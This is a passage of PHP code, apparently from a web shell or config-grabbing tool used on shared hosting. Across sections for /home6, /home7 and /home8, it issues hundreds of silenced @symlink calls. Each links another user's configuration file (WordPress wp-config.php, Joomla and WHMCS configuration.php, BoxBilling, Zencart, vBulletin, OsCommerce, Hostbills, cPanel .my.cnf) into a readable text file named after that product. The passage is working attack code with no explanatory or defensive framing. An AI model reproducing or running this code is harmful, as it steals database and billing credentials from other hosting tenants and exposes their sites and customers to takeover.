  1982. @symlink('/home6/'.$user.'/public_html/BILLINGS/configuration.php',$user.'-WHMCS.txt');
  1983. @symlink('/home6/'.$user.'/public_html/Billings/configuration.php',$user.'-WHMCS.txt');
  1984. @symlink('/home6/'.$user.'/public_html/billings/configuration.php',$user.'-WHMCS.txt');
  1985. @symlink('/home6/'.$user.'/public_html/BASKET/configuration.php',$user.'-WHMCS.txt');
  1986. @symlink('/home6/'.$user.'/public_html/Basket/configuration.php',$user.'-WHMCS.txt');
  1987. @symlink('/home6/'.$user.'/public_html/basket/configuration.php',$user.'-WHMCS.txt');
  1988. @symlink('/home6/'.$user.'/public_html/SECURE/configuration.php',$user.'-WHMCS.txt');
  1989. @symlink('/home6/'.$user.'/public_html/Secure/configuration.php',$user.'-WHMCS.txt');
  1990. @symlink('/home6/'.$user.'/public_html/secure/configuration.php',$user.'-WHMCS.txt');
  1991. @symlink('/home6/'.$user.'/public_html/SALES/configuration.php',$user.'-WHMCS.txt');
  1992. @symlink('/home6/'.$user.'/public_html/Sales/configuration.php',$user.'-WHMCS.txt');
  1993. @symlink('/home6/'.$user.'/public_html/sales/configuration.php',$user.'-WHMCS.txt');
  1994. @symlink('/home6/'.$user.'/public_html/BILL/configuration.php',$user.'-WHMCS.txt');
  1995. @symlink('/home6/'.$user.'/public_html/Bill/configuration.php',$user.'-WHMCS.txt');
  1996. @symlink('/home6/'.$user.'/public_html/bill/configuration.php',$user.'-WHMCS.txt');
  1997. @symlink('/home6/'.$user.'/public_html/PURCHASE/configuration.php',$user.'-WHMCS.txt');
  1998. @symlink('/home6/'.$user.'/public_html/Purchase/configuration.php',$user.'-WHMCS.txt');
  1999. @symlink('/home6/'.$user.'/public_html/purchase/configuration.php',$user.'-WHMCS.txt');
  2000. @symlink('/home6/'.$user.'/public_html/ACCOUNT/configuration.php',$user.'-WHMCS.txt');
  2001. @symlink('/home6/'.$user.'/public_html/Account/configuration.php',$user.'-WHMCS.txt');
  2002. @symlink('/home6/'.$user.'/public_html/account/configuration.php',$user.'-WHMCS.txt');
  2003. @symlink('/home6/'.$user.'/public_html/USER/configuration.php',$user.'-WHMCS.txt');
  2004. @symlink('/home6/'.$user.'/public_html/User/configuration.php',$user.'-WHMCS.txt');
  2005. @symlink('/home6/'.$user.'/public_html/user/configuration.php',$user.'-WHMCS.txt');
  2006. @symlink('/home6/'.$user.'/public_html/CLIENTS/configuration.php',$user.'-WHMCS.txt');
  2007. @symlink('/home6/'.$user.'/public_html/Clients/configuration.php',$user.'-WHMCS.txt');
  2008. @symlink('/home6/'.$user.'/public_html/clients/configuration.php',$user.'-WHMCS.txt');
  2009. @symlink('/home6/'.$user.'/public_html/BILLINGS/configuration.php',$user.'-WHMCS.txt');
  2010. @symlink('/home6/'.$user.'/public_html/Billings/configuration.php',$user.'-WHMCS.txt');
  2011. @symlink('/home6/'.$user.'/public_html/billings/configuration.php',$user.'-WHMCS.txt');
  2012. @symlink('/home6/'.$user.'/public_html/MY/configuration.php',$user.'-WHMCS.txt');
  2013. @symlink('/home6/'.$user.'/public_html/My/configuration.php',$user.'-WHMCS.txt');
  2014. @symlink('/home6/'.$user.'/public_html/my/configuration.php',$user.'-WHMCS.txt');
  2015. @symlink('/home6/'.$user.'/public_html/secure/whm/configuration.php',$user.'-WHMCS.txt');
  2016. @symlink('/home6/'.$user.'/public_html/secure/whmcs/configuration.php',$user.'-WHMCS.txt');
  2017. @symlink('/home6/'.$user.'/public_html/panel/configuration.php',$user.'-WHMCS.txt');
  2018. @symlink('/home6/'.$user.'/public_html/clientes/configuration.php',$user.'-WHMCS.txt');
  2019. @symlink('/home6/'.$user.'/public_html/cliente/configuration.php',$user.'-WHMCS.txt');
  2020. @symlink('/home6/'.$user.'/public_html/support/order/configuration.php',$user.'-WHMCS.txt');
  2021. @symlink('/home6/'.$user.'/public_html/bb-config.php',$user.'-BoxBilling.txt');
  2022. @symlink('/home6/'.$user.'/public_html/boxbilling/bb-config.php',$user.'-BoxBilling.txt');
  2023. @symlink('/home6/'.$user.'/public_html/box/bb-config.php',$user.'-BoxBilling.txt');
  2024. @symlink('/home6/'.$user.'/public_html/host/bb-config.php',$user.'-BoxBilling.txt');
  2025. @symlink('/home6/'.$user.'/public_html/Host/bb-config.php',$user.'-BoxBilling.txt');
  2026. @symlink('/home6/'.$user.'/public_html/supportes/bb-config.php',$user.'-BoxBilling.txt');
  2027. @symlink('/home6/'.$user.'/public_html/support/bb-config.php',$user.'-BoxBilling.txt');
  2028. @symlink('/home6/'.$user.'/public_html/hosting/bb-config.php',$user.'-BoxBilling.txt');
  2029. @symlink('/home6/'.$user.'/public_html/cart/bb-config.php',$user.'-BoxBilling.txt');
  2030. @symlink('/home6/'.$user.'/public_html/order/bb-config.php',$user.'-BoxBilling.txt');
  2031. @symlink('/home6/'.$user.'/public_html/client/bb-config.php',$user.'-BoxBilling.txt');
  2032. @symlink('/home6/'.$user.'/public_html/clients/bb-config.php',$user.'-BoxBilling.txt');
  2033. @symlink('/home6/'.$user.'/public_html/cliente/bb-config.php',$user.'-BoxBilling.txt');
  2034. @symlink('/home6/'.$user.'/public_html/clientes/bb-config.php',$user.'-BoxBilling.txt');
  2035. @symlink('/home6/'.$user.'/public_html/billing/bb-config.php',$user.'-BoxBilling.txt');
  2036. @symlink('/home6/'.$user.'/public_html/billings/bb-config.php',$user.'-BoxBilling.txt');
  2037. @symlink('/home6/'.$user.'/public_html/my/bb-config.php',$user.'-BoxBilling.txt');
  2038. @symlink('/home6/'.$user.'/public_html/secure/bb-config.php',$user.'-BoxBilling.txt');
  2039. @symlink('/home6/'.$user.'/public_html/support/order/bb-config.php',$user.'-BoxBilling.txt');
  2040. @symlink('/home6/'.$user.'/public_html/includes/dist-configure.php',$user.'-Zencart.txt');
  2041. @symlink('/home6/'.$user.'/public_html/zencart/includes/dist-configure.php',$user.'-Zencart.txt');
  2042. @symlink('/home6/'.$user.'/public_html/products/includes/dist-configure.php',$user.'-Zencart.txt');
  2043. @symlink('/home6/'.$user.'/public_html/cart/includes/dist-configure.php',$user.'-Zencart.txt');
  2044. @symlink('/home6/'.$user.'/public_html/shop/includes/dist-configure.php',$user.'-Zencart.txt');
  2045. @symlink('/home6/'.$user.'/public_html/includes/iso4217.php',$user.'-Hostbills.txt');
  2046. @symlink('/home6/'.$user.'/public_html/hostbills/includes/iso4217.php',$user.'-Hostbills.txt');
  2047. @symlink('/home6/'.$user.'/public_html/host/includes/iso4217.php',$user.'-Hostbills.txt');
  2048. @symlink('/home6/'.$user.'/public_html/Host/includes/iso4217.php',$user.'-Hostbills.txt');
  2049. @symlink('/home6/'.$user.'/public_html/supportes/includes/iso4217.php',$user.'-Hostbills.txt');
  2050. @symlink('/home6/'.$user.'/public_html/support/includes/iso4217.php',$user.'-Hostbills.txt');
  2051. @symlink('/home6/'.$user.'/public_html/hosting/includes/iso4217.php',$user.'-Hostbills.txt');
  2052. @symlink('/home6/'.$user.'/public_html/cart/includes/iso4217.php',$user.'-Hostbills.txt');
  2053. @symlink('/home6/'.$user.'/public_html/order/includes/iso4217.php',$user.'-Hostbills.txt');
  2054. @symlink('/home6/'.$user.'/public_html/client/includes/iso4217.php',$user.'-Hostbills.txt');
  2055. @symlink('/home6/'.$user.'/public_html/clients/includes/iso4217.php',$user.'-Hostbills.txt');
  2056. @symlink('/home6/'.$user.'/public_html/cliente/includes/iso4217.php',$user.'-Hostbills.txt');
  2057. @symlink('/home6/'.$user.'/public_html/clientes/includes/iso4217.php',$user.'-Hostbills.txt');
  2058. @symlink('/home6/'.$user.'/public_html/billing/includes/iso4217.php',$user.'-Hostbills.txt');
  2059. @symlink('/home6/'.$user.'/public_html/billings/includes/iso4217.php',$user.'-Hostbills.txt');
  2060. @symlink('/home6/'.$user.'/public_html/my/includes/iso4217.php',$user.'-Hostbills.txt');
  2061. @symlink('/home6/'.$user.'/public_html/secure/includes/iso4217.php',$user.'-Hostbills.txt');
  2062. @symlink('/home6/'.$user.'/public_html/support/order/includes/iso4217.php',$user.'-Hostbills.txt');
  2063. @symlink('/home6/'.$user.'/.my.cnf',$user.'-Cpanel.txt');
  2064. @symlink('/home6/'.$user.'/public_html/po-content/config.php',$user.'-Popoji.txt');
  2065.  
  2066. //home 7
  2067.  
  2068. @symlink('/home7/'.$user.'/public_html/vb/includes/config.php',$user.'-Vbulletin.txt');
  2069. @symlink('/home7/'.$user.'/public_html/includes/config.php',$user.'-Vbulletin.txt');
  2070. @symlink('/home7/'.$user.'/public_html/forum/includes/config.php',$user.'-Vbulletin.txt');
  2071. @symlink('/home7/'.$user.'/public_html/forums/includes/config.php',$user.'-Vbulletin.txt');
  2072. @symlink('/home7/'.$user.'/public_html/cc/includes/config.php',$user.'-Vbulletin.txt');
  2073. @symlink('/home7/'.$user.'/public_html/inc/config.php',$user.'-MyBB.txt');
  2074. @symlink('/home7/'.$user.'/public_html/includes/configure.php',$user.'-OsCommerce.txt');
  2075. @symlink('/home7/'.$user.'/public_html/shop/includes/configure.php',$user.'-OsCommerce.txt');
  2076. @symlink('/home7/'.$user.'/public_html/os/includes/configure.php',$user.'-OsCommerce.txt');
  2077. @symlink('/home7/'.$user.'/public_html/oscom/includes/configure.php',$user.'-OsCommerce.txt');
  2078. @symlink('/home7/'.$user.'/public_html/products/includes/configure.php',$user.'-OsCommerce.txt');
  2079. @symlink('/home7/'.$user.'/public_html/cart/includes/configure.php',$user.'-OsCommerce.txt');
  2080. @symlink('/home7/'.$user.'/public_html/inc/conf_global.php',$user.'-IPB.txt');
  2081. @symlink('/home7/'.$user.'/public_html/wp-config.php',$user.'-Wordpress.txt');
  2082. @symlink('/home7/'.$user.'/public_html/wp/test/wp-config.php',$user.'-Wordpress.txt');
  2083. @symlink('/home7/'.$user.'/public_html/blog/wp-config.php',$user.'-Wordpress.txt');
  2084. @symlink('/home7/'.$user.'/public_html/beta/wp-config.php',$user.'-Wordpress.txt');
  2085. @symlink('/home7/'.$user.'/public_html/portal/wp-config.php',$user.'-Wordpress.txt');
  2086. @symlink('/home7/'.$user.'/public_html/site/wp-config.php',$user.'-Wordpress.txt');
  2087. @symlink('/home7/'.$user.'/public_html/wp/wp-config.php',$user.'-Wordpress.txt');
  2088. @symlink('/home7/'.$user.'/public_html/WP/wp-config.php',$user.'-Wordpress.txt');
  2089. @symlink('/home7/'.$user.'/public_html/news/wp-config.php',$user.'-Wordpress.txt');
  2090. @symlink('/home7/'.$user.'/public_html/wordpress/wp-config.php',$user.'-Wordpress.txt');
  2091. @symlink('/home7/'.$user.'/public_html/test/wp-config.php',$user.'-Wordpress.txt');
  2092. @symlink('/home7/'.$user.'/public_html/demo/wp-config.php',$user.'-Wordpress.txt');
  2093. @symlink('/home7/'.$user.'/public_html/home/wp-config.php',$user.'-Wordpress.txt');
  2094. @symlink('/home7/'.$user.'/public_html/v1/wp-config.php',$user.'-Wordpress.txt');
  2095. @symlink('/home7/'.$user.'/public_html/v2/wp-config.php',$user.'-Wordpress.txt');
  2096. @symlink('/home7/'.$user.'/public_html/press/wp-config.php',$user.'-Wordpress.txt');
  2097. @symlink('/home7/'.$user.'/public_html/new/wp-config.php',$user.'-Wordpress.txt');
  2098. @symlink('/home7/'.$user.'/public_html/blogs/wp-config.php',$user.'-Wordpress.txt');
  2099. @symlink('/home7/'.$user.'/public_html/configuration.php',$user.'-Joomla.txt');
  2100. @symlink('/home7/'.$user.'/public_html/blog/configuration.php',$user.'-Joomla.txt');
  2101. @symlink('/home7/'.$user.'/public_html/submitticket.php',$user.'-^WHMCS.txt');
  2102. @symlink('/home7/'.$user.'/public_html/cms/configuration.php',$user.'-Joomla.txt');
  2103. @symlink('/home7/'.$user.'/public_html/beta/configuration.php',$user.'-Joomla.txt');
  2104. @symlink('/home7/'.$user.'/public_html/portal/configuration.php',$user.'-Joomla.txt');
  2105. @symlink('/home7/'.$user.'/public_html/site/configuration.php',$user.'-Joomla.txt');
  2106. @symlink('/home7/'.$user.'/public_html/main/configuration.php',$user.'-Joomla.txt');
  2107. @symlink('/home7/'.$user.'/public_html/home/configuration.php',$user.'-Joomla.txt');
  2108. @symlink('/home7/'.$user.'/public_html/demo/configuration.php',$user.'-Joomla.txt');
  2109. @symlink('/home7/'.$user.'/public_html/test/configuration.php',$user.'-Joomla.txt');
  2110. @symlink('/home7/'.$user.'/public_html/v1/configuration.php',$user.'-Joomla.txt');
  2111. @symlink('/home7/'.$user.'/public_html/v2/configuration.php',$user.'-Joomla.txt');
  2112. @symlink('/home7/'.$user.'/public_html/joomla/configuration.php',$user.'-Joomla.txt');
  2113. @symlink('/home7/'.$user.'/public_html/new/configuration.php',$user.'-Joomla.txt');
  2114. @symlink('/home7/'.$user.'/public_html/WHMCS/configuration.php',$user.'-WHMCS.txt');
  2115. @symlink('/home7/'.$user.'/public_html/whmcs1/configuration.php',$user.'-WHMCS.txt');
  2116. @symlink('/home7/'.$user.'/public_html/Whmcs/configuration.php',$user.'-WHMCS.txt');
  2117. @symlink('/home7/'.$user.'/public_html/whmcs/configuration.php',$user.'-WHMCS.txt');
  2118. @symlink('/home7/'.$user.'/public_html/whmcs/configuration.php',$user.'-WHMCS.txt');
  2119. @symlink('/home7/'.$user.'/public_html/WHMC/configuration.php',$user.'-WHMCS.txt');
  2120. @symlink('/home7/'.$user.'/public_html/Whmc/configuration.php',$user.'-WHMCS.txt');
  2121. @symlink('/home7/'.$user.'/public_html/whmc/configuration.php',$user.'-WHMCS.txt');
  2122. @symlink('/home7/'.$user.'/public_html/WHM/configuration.php',$user.'-WHMCS.txt');
  2123. @symlink('/home7/'.$user.'/public_html/Whm/configuration.php',$user.'-WHMCS.txt');
  2124. @symlink('/home7/'.$user.'/public_html/whm/configuration.php',$user.'-WHMCS.txt');
  2125. @symlink('/home7/'.$user.'/public_html/HOST/configuration.php',$user.'-WHMCS.txt');
  2126. @symlink('/home7/'.$user.'/public_html/Host/configuration.php',$user.'-WHMCS.txt');
  2127. @symlink('/home7/'.$user.'/public_html/host/configuration.php',$user.'-WHMCS.txt');
  2128. @symlink('/home7/'.$user.'/public_html/SUPPORTES/configuration.php',$user.'-WHMCS.txt');
  2129. @symlink('/home7/'.$user.'/public_html/Supportes/configuration.php',$user.'-WHMCS.txt');
  2130. @symlink('/home7/'.$user.'/public_html/supportes/configuration.php',$user.'-WHMCS.txt');
  2131. @symlink('/home7/'.$user.'/public_html/domains/configuration.php',$user.'-WHMCS.txt');
  2132. @symlink('/home7/'.$user.'/public_html/domain/configuration.php',$user.'-WHMCS.txt');
  2133. @symlink('/home7/'.$user.'/public_html/Hosting/configuration.php',$user.'-WHMCS.txt');
  2134. @symlink('/home7/'.$user.'/public_html/HOSTING/configuration.php',$user.'-WHMCS.txt');
  2135. @symlink('/home7/'.$user.'/public_html/hosting/configuration.php',$user.'-WHMCS.txt');
  2136. @symlink('/home7/'.$user.'/public_html/CART/configuration.php',$user.'-WHMCS.txt');
  2137. @symlink('/home7/'.$user.'/public_html/Cart/configuration.php',$user.'-WHMCS.txt');
  2138. @symlink('/home7/'.$user.'/public_html/cart/configuration.php',$user.'-WHMCS.txt');
  2139. @symlink('/home7/'.$user.'/public_html/ORDER/configuration.php',$user.'-WHMCS.txt');
  2140. @symlink('/home7/'.$user.'/public_html/Order/configuration.php',$user.'-WHMCS.txt');
  2141. @symlink('/home7/'.$user.'/public_html/order/configuration.php',$user.'-WHMCS.txt');
  2142. @symlink('/home7/'.$user.'/public_html/CLIENT/configuration.php',$user.'-WHMCS.txt');
  2143. @symlink('/home7/'.$user.'/public_html/Client/configuration.php',$user.'-WHMCS.txt');
  2144. @symlink('/home7/'.$user.'/public_html/client/configuration.php',$user.'-WHMCS.txt');
  2145. @symlink('/home7/'.$user.'/public_html/CLIENTAREA/configuration.php',$user.'-WHMCS.txt');
  2146. @symlink('/home7/'.$user.'/public_html/Clientarea/configuration.php',$user.'-WHMCS.txt');
  2147. @symlink('/home7/'.$user.'/public_html/clientarea/configuration.php',$user.'-WHMCS.txt');
  2148. @symlink('/home7/'.$user.'/public_html/SUPPORT/configuration.php',$user.'-WHMCS.txt');
  2149. @symlink('/home7/'.$user.'/public_html/Support/configuration.php',$user.'-WHMCS.txt');
  2150. @symlink('/home7/'.$user.'/public_html/support/configuration.php',$user.'-WHMCS.txt');
  2151. @symlink('/home7/'.$user.'/public_html/BILLING/configuration.php',$user.'-WHMCS.txt');
  2152. @symlink('/home7/'.$user.'/public_html/Billing/configuration.php',$user.'-WHMCS.txt');
  2153. @symlink('/home7/'.$user.'/public_html/billing/configuration.php',$user.'-WHMCS.txt');
  2154. @symlink('/home7/'.$user.'/public_html/BUY/configuration.php',$user.'-WHMCS.txt');
  2155. @symlink('/home7/'.$user.'/public_html/Buy/configuration.php',$user.'-WHMCS.txt');
  2156. @symlink('/home7/'.$user.'/public_html/buy/configuration.php',$user.'-WHMCS.txt');
  2157. @symlink('/home7/'.$user.'/public_html/MANAGE/configuration.php',$user.'-WHMCS.txt');
  2158. @symlink('/home7/'.$user.'/public_html/Manage/configuration.php',$user.'-WHMCS.txt');
  2159. @symlink('/home7/'.$user.'/public_html/manage/configuration.php',$user.'-WHMCS.txt');
  2160. @symlink('/home7/'.$user.'/public_html/CLIENTSUPPORT/configuration.php',$user.'-WHMCS.txt');
  2161. @symlink('/home7/'.$user.'/public_html/ClientSupport/configuration.php',$user.'-WHMCS.txt');
  2162. @symlink('/home7/'.$user.'/public_html/Clientsupport/configuration.php',$user.'-WHMCS.txt');
  2163. @symlink('/home7/'.$user.'/public_html/clientsupport/configuration.php',$user.'-WHMCS.txt');
  2164. @symlink('/home7/'.$user.'/public_html/CHECKOUT/configuration.php',$user.'-WHMCS.txt');
  2165. @symlink('/home7/'.$user.'/public_html/Checkout/configuration.php',$user.'-WHMCS.txt');
  2166. @symlink('/home7/'.$user.'/public_html/checkout/configuration.php',$user.'-WHMCS.txt');
  2167. @symlink('/home7/'.$user.'/public_html/BILLINGS/configuration.php',$user.'-WHMCS.txt');
  2168. @symlink('/home7/'.$user.'/public_html/Billings/configuration.php',$user.'-WHMCS.txt');
  2169. @symlink('/home7/'.$user.'/public_html/billings/configuration.php',$user.'-WHMCS.txt');
  2170. @symlink('/home7/'.$user.'/public_html/BASKET/configuration.php',$user.'-WHMCS.txt');
  2171. @symlink('/home7/'.$user.'/public_html/Basket/configuration.php',$user.'-WHMCS.txt');
  2172. @symlink('/home7/'.$user.'/public_html/basket/configuration.php',$user.'-WHMCS.txt');
  2173. @symlink('/home7/'.$user.'/public_html/SECURE/configuration.php',$user.'-WHMCS.txt');
  2174. @symlink('/home7/'.$user.'/public_html/Secure/configuration.php',$user.'-WHMCS.txt');
  2175. @symlink('/home7/'.$user.'/public_html/secure/configuration.php',$user.'-WHMCS.txt');
  2176. @symlink('/home7/'.$user.'/public_html/SALES/configuration.php',$user.'-WHMCS.txt');
  2177. @symlink('/home7/'.$user.'/public_html/Sales/configuration.php',$user.'-WHMCS.txt');
  2178. @symlink('/home7/'.$user.'/public_html/sales/configuration.php',$user.'-WHMCS.txt');
  2179. @symlink('/home7/'.$user.'/public_html/BILL/configuration.php',$user.'-WHMCS.txt');
  2180. @symlink('/home7/'.$user.'/public_html/Bill/configuration.php',$user.'-WHMCS.txt');
  2181. @symlink('/home7/'.$user.'/public_html/bill/configuration.php',$user.'-WHMCS.txt');
  2182. @symlink('/home7/'.$user.'/public_html/PURCHASE/configuration.php',$user.'-WHMCS.txt');
  2183. @symlink('/home7/'.$user.'/public_html/Purchase/configuration.php',$user.'-WHMCS.txt');
  2184. @symlink('/home7/'.$user.'/public_html/purchase/configuration.php',$user.'-WHMCS.txt');
  2185. @symlink('/home7/'.$user.'/public_html/ACCOUNT/configuration.php',$user.'-WHMCS.txt');
  2186. @symlink('/home7/'.$user.'/public_html/Account/configuration.php',$user.'-WHMCS.txt');
  2187. @symlink('/home7/'.$user.'/public_html/account/configuration.php',$user.'-WHMCS.txt');
  2188. @symlink('/home7/'.$user.'/public_html/USER/configuration.php',$user.'-WHMCS.txt');
  2189. @symlink('/home7/'.$user.'/public_html/User/configuration.php',$user.'-WHMCS.txt');
  2190. @symlink('/home7/'.$user.'/public_html/user/configuration.php',$user.'-WHMCS.txt');
  2191. @symlink('/home7/'.$user.'/public_html/CLIENTS/configuration.php',$user.'-WHMCS.txt');
  2192. @symlink('/home7/'.$user.'/public_html/Clients/configuration.php',$user.'-WHMCS.txt');
  2193. @symlink('/home7/'.$user.'/public_html/clients/configuration.php',$user.'-WHMCS.txt');
  2194. @symlink('/home7/'.$user.'/public_html/BILLINGS/configuration.php',$user.'-WHMCS.txt');
  2195. @symlink('/home7/'.$user.'/public_html/Billings/configuration.php',$user.'-WHMCS.txt');
  2196. @symlink('/home7/'.$user.'/public_html/billings/configuration.php',$user.'-WHMCS.txt');
  2197. @symlink('/home7/'.$user.'/public_html/MY/configuration.php',$user.'-WHMCS.txt');
  2198. @symlink('/home7/'.$user.'/public_html/My/configuration.php',$user.'-WHMCS.txt');
  2199. @symlink('/home7/'.$user.'/public_html/my/configuration.php',$user.'-WHMCS.txt');
  2200. @symlink('/home7/'.$user.'/public_html/secure/whm/configuration.php',$user.'-WHMCS.txt');
  2201. @symlink('/home7/'.$user.'/public_html/secure/whmcs/configuration.php',$user.'-WHMCS.txt');
  2202. @symlink('/home7/'.$user.'/public_html/panel/configuration.php',$user.'-WHMCS.txt');
  2203. @symlink('/home7/'.$user.'/public_html/clientes/configuration.php',$user.'-WHMCS.txt');
  2204. @symlink('/home7/'.$user.'/public_html/cliente/configuration.php',$user.'-WHMCS.txt');
  2205. @symlink('/home7/'.$user.'/public_html/support/order/configuration.php',$user.'-WHMCS.txt');
  2206. @symlink('/home7/'.$user.'/public_html/bb-config.php',$user.'-BoxBilling.txt');
  2207. @symlink('/home7/'.$user.'/public_html/boxbilling/bb-config.php',$user.'-BoxBilling.txt');
  2208. @symlink('/home7/'.$user.'/public_html/box/bb-config.php',$user.'-BoxBilling.txt');
  2209. @symlink('/home7/'.$user.'/public_html/host/bb-config.php',$user.'-BoxBilling.txt');
  2210. @symlink('/home7/'.$user.'/public_html/Host/bb-config.php',$user.'-BoxBilling.txt');
  2211. @symlink('/home7/'.$user.'/public_html/supportes/bb-config.php',$user.'-BoxBilling.txt');
  2212. @symlink('/home7/'.$user.'/public_html/support/bb-config.php',$user.'-BoxBilling.txt');
  2213. @symlink('/home7/'.$user.'/public_html/hosting/bb-config.php',$user.'-BoxBilling.txt');
  2214. @symlink('/home7/'.$user.'/public_html/cart/bb-config.php',$user.'-BoxBilling.txt');
  2215. @symlink('/home7/'.$user.'/public_html/order/bb-config.php',$user.'-BoxBilling.txt');
  2216. @symlink('/home7/'.$user.'/public_html/client/bb-config.php',$user.'-BoxBilling.txt');
  2217. @symlink('/home7/'.$user.'/public_html/clients/bb-config.php',$user.'-BoxBilling.txt');
  2218. @symlink('/home7/'.$user.'/public_html/cliente/bb-config.php',$user.'-BoxBilling.txt');
  2219. @symlink('/home7/'.$user.'/public_html/clientes/bb-config.php',$user.'-BoxBilling.txt');
  2220. @symlink('/home7/'.$user.'/public_html/billing/bb-config.php',$user.'-BoxBilling.txt');
  2221. @symlink('/home7/'.$user.'/public_html/billings/bb-config.php',$user.'-BoxBilling.txt');
  2222. @symlink('/home7/'.$user.'/public_html/my/bb-config.php',$user.'-BoxBilling.txt');
  2223. @symlink('/home7/'.$user.'/public_html/secure/bb-config.php',$user.'-BoxBilling.txt');
  2224. @symlink('/home7/'.$user.'/public_html/support/order/bb-config.php',$user.'-BoxBilling.txt');
  2225. @symlink('/home7/'.$user.'/public_html/includes/dist-configure.php',$user.'-Zencart.txt');
  2226. @symlink('/home7/'.$user.'/public_html/zencart/includes/dist-configure.php',$user.'-Zencart.txt');
  2227. @symlink('/home7/'.$user.'/public_html/products/includes/dist-configure.php',$user.'-Zencart.txt');
  2228. @symlink('/home7/'.$user.'/public_html/cart/includes/dist-configure.php',$user.'-Zencart.txt');
  2229. @symlink('/home7/'.$user.'/public_html/shop/includes/dist-configure.php',$user.'-Zencart.txt');
  2230. @symlink('/home7/'.$user.'/public_html/includes/iso4217.php',$user.'-Hostbills.txt');
  2231. @symlink('/home7/'.$user.'/public_html/hostbills/includes/iso4217.php',$user.'-Hostbills.txt');
  2232. @symlink('/home7/'.$user.'/public_html/host/includes/iso4217.php',$user.'-Hostbills.txt');
  2233. @symlink('/home7/'.$user.'/public_html/Host/includes/iso4217.php',$user.'-Hostbills.txt');
  2234. @symlink('/home7/'.$user.'/public_html/supportes/includes/iso4217.php',$user.'-Hostbills.txt');
  2235. @symlink('/home7/'.$user.'/public_html/support/includes/iso4217.php',$user.'-Hostbills.txt');
  2236. @symlink('/home7/'.$user.'/public_html/hosting/includes/iso4217.php',$user.'-Hostbills.txt');
  2237. @symlink('/home7/'.$user.'/public_html/cart/includes/iso4217.php',$user.'-Hostbills.txt');
  2238. @symlink('/home7/'.$user.'/public_html/order/includes/iso4217.php',$user.'-Hostbills.txt');
  2239. @symlink('/home7/'.$user.'/public_html/client/includes/iso4217.php',$user.'-Hostbills.txt');
  2240. @symlink('/home7/'.$user.'/public_html/clients/includes/iso4217.php',$user.'-Hostbills.txt');
  2241. @symlink('/home7/'.$user.'/public_html/cliente/includes/iso4217.php',$user.'-Hostbills.txt');
  2242. @symlink('/home7/'.$user.'/public_html/clientes/includes/iso4217.php',$user.'-Hostbills.txt');
  2243. @symlink('/home7/'.$user.'/public_html/billing/includes/iso4217.php',$user.'-Hostbills.txt');
  2244. @symlink('/home7/'.$user.'/public_html/billings/includes/iso4217.php',$user.'-Hostbills.txt');
  2245. @symlink('/home7/'.$user.'/public_html/my/includes/iso4217.php',$user.'-Hostbills.txt');
  2246. @symlink('/home7/'.$user.'/public_html/secure/includes/iso4217.php',$user.'-Hostbills.txt');
  2247. @symlink('/home7/'.$user.'/public_html/support/order/includes/iso4217.php',$user.'-Hostbills.txt');
  2248. @symlink('/home7/'.$user.'/.my.cnf',$user.'-Cpanel.txt');
  2249. @symlink('/home7/'.$user.'/public_html/po-content/config.php',$user.'-Popoji.txt');
  2250.  
  2251. //home 8
  2252.  
  2253. @symlink('/home8/'.$user.'/public_html/vb/includes/config.php',$user.'-Vbulletin.txt');
  2254. @symlink('/home8/'.$user.'/public_html/includes/config.php',$user.'-Vbulletin.txt');
  2255. @symlink('/home8/'.$user.'/public_html/forum/includes/config.php',$user.'-Vbulletin.txt');
  2256. @symlink('/home8/'.$user.'/public_html/forums/includes/config.php',$user.'-Vbulletin.txt');
  2257. @symlink('/home8/'.$user.'/public_html/cc/includes/config.php',$user.'-Vbulletin.txt');
  2258. @symlink('/home8/'.$user.'/public_html/inc/config.php',$user.'-MyBB.txt');
  2259. @symlink('/home8/'.$user.'/public_html/includes/configure.php',$user.'-OsCommerce.txt');
  2260. @symlink('/home8/'.$user.'/public_html/shop/includes/configure.php',$user.'-OsCommerce.txt');
  2261. @symlink('/home8/'.$user.'/public_html/os/includes/configure.php',$user.'-OsCommerce.txt');
  2262. @symlink('/home8/'.$user.'/public_html/oscom/includes/configure.php',$user.'-OsCommerce.txt');
  2263. @symlink('/home8/'.$user.'/public_html/products/includes/configure.php',$user.'-OsCommerce.txt');
  2264. @symlink('/home8/'.$user.'/public_html/cart/includes/configure.php',$user.'-OsCommerce.txt');
  2265. @symlink('/home8/'.$user.'/public_html/inc/conf_global.php',$user.'-IPB.txt');
  2266. @symlink('/home8/'.$user.'/public_html/wp-config.php',$user.'-Wordpress.txt');
  2267. @symlink('/home8/'.$user.'/public_html/wp/test/wp-config.php',$user.'-Wordpress.txt');
  2268. @symlink('/home8/'.$user.'/public_html/blog/wp-config.php',$user.'-Wordpress.txt');
  2269. @symlink('/home8/'.$user.'/public_html/beta/wp-config.php',$user.'-Wordpress.txt');
  2270. @symlink('/home8/'.$user.'/public_html/portal/wp-config.php',$user.'-Wordpress.txt');
  2271. @symlink('/home8/'.$user.'/public_html/site/wp-config.php',$user.'-Wordpress.txt');
  2272. @symlink('/home8/'.$user.'/public_html/wp/wp-config.php',$user.'-Wordpress.txt');
  2273. @symlink('/home8/'.$user.'/public_html/WP/wp-config.php',$user.'-Wordpress.txt');
  2274. @symlink('/home8/'.$user.'/public_html/news/wp-config.php',$user.'-Wordpress.txt');
  2275. @symlink('/home8/'.$user.'/public_html/wordpress/wp-config.php',$user.'-Wordpress.txt');
  2276. @symlink('/home8/'.$user.'/public_html/test/wp-config.php',$user.'-Wordpress.txt');
  2277. @symlink('/home8/'.$user.'/public_html/demo/wp-config.php',$user.'-Wordpress.txt');
  2278. @symlink('/home8/'.$user.'/public_html/home/wp-config.php',$user.'-Wordpress.txt');
  2279. @symlink('/home8/'.$user.'/public_html/v1/wp-config.php',$user.'-Wordpress.txt');
  2280. @symlink('/home8/'.$user.'/public_html/v2/wp-config.php',$user.'-Wordpress.txt');
  2281. @symlink('/home8/'.$user.'/public_html/press/wp-config.php',$user.'-Wordpress.txt');
  2282. @symlink('/home8/'.$user.'/public_html/new/wp-config.php',$user.'-Wordpress.txt');
  2283. @symlink('/home8/'.$user.'/public_html/blogs/wp-config.php',$user.'-Wordpress.txt');
  2284. @symlink('/home8/'.$user.'/public_html/configuration.php',$user.'-Joomla.txt');
  2285. @symlink('/home8/'.$user.'/public_html/blog/configuration.php',$user.'-Joomla.txt');
  2286. @symlink('/home8/'.$user.'/public_html/submitticket.php',$user.'-^WHMCS.txt');
  2287. @symlink('/home8/'.$user.'/public_html/cms/configuration.php',$user.'-Joomla.txt');
  2288. @symlink('/home8/'.$user.'/public_html/beta/configuration.php',$user.'-Joomla.txt');
  2289. @symlink('/home8/'.$user.'/public_html/portal/configuration.php',$user.'-Joomla.txt');
